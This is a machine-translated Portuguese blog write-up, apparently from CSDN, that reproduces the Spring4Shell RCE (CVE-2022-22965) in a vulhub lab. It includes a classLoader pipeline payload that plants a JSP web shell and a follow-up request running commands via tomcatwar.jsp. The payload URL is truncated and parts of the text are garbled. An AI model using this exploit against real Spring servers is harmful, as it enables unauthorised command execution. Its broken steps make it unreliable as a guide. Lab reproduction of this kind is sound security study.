Vulnerabilidade de execução remota de código do Spring Framework_CVE-2022-22965-recorrência

Introdução à Vulnerabilidade 0x01

Spring Framework é uma estrutura de aplicativo de software livre.Sua intenção original é reduzir a complexidade do desenvolvimento de aplicativos.Ele possui uma arquitetura em camadas, permite que os usuários selecionem componentes e fornece uma estrutura útil para o desenvolvimento de aplicativos J2EE. Quando o Spring é implantado no JDK9 e superior, os invasores remotos podem explorar essa vulnerabilidade para escrever código mal-intencionado para causar a execução remota de código.

0x02 Reaparição da Vulnerabilidade

vulhub/spring/CVE-2022-22965 no mestre · vulhub/vulhub · GitHub

Use o comando no diretório atual: docker-compose up -d para abrir o ambiente com um clique:

Veja se a porta atual está aberta em 8080:

Depois de abrir a página, você pode ver que o serviço atual está ativo:

http://127.0.0.1:8080/

Segue o link do autor:

http://127.0.0.1:8080/?name=Bob&age=25

A página aparece:

Então, de acordo com o prompt, construa o endereço da solicitação: ( 方法不唯一)

http://127.0.0.1:8080/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25

Depois que a solicitação é feita, uma transformação é necessária:

A parte vermelha é substituída por:

?

1

2

3

4

5

suffix: %>//

c1: Runtime

c2: <%

DNT: 1

Content-Length: 2

O efeito é mostrado na figura abaixo:

Então visite:

?

1

http://10.30.2.146:8080//tomcatwar.jsp?pwd=j&cmd=whoami

Basta executar o comando!

Observe que várias execuções aqui gravarão arquivos continuamente no log, por favor, não opere com frequência!

Acho que você gosta

Origin blog.csdn.net/qq_18209847/article/details/124025563
Recomendado
Clasificación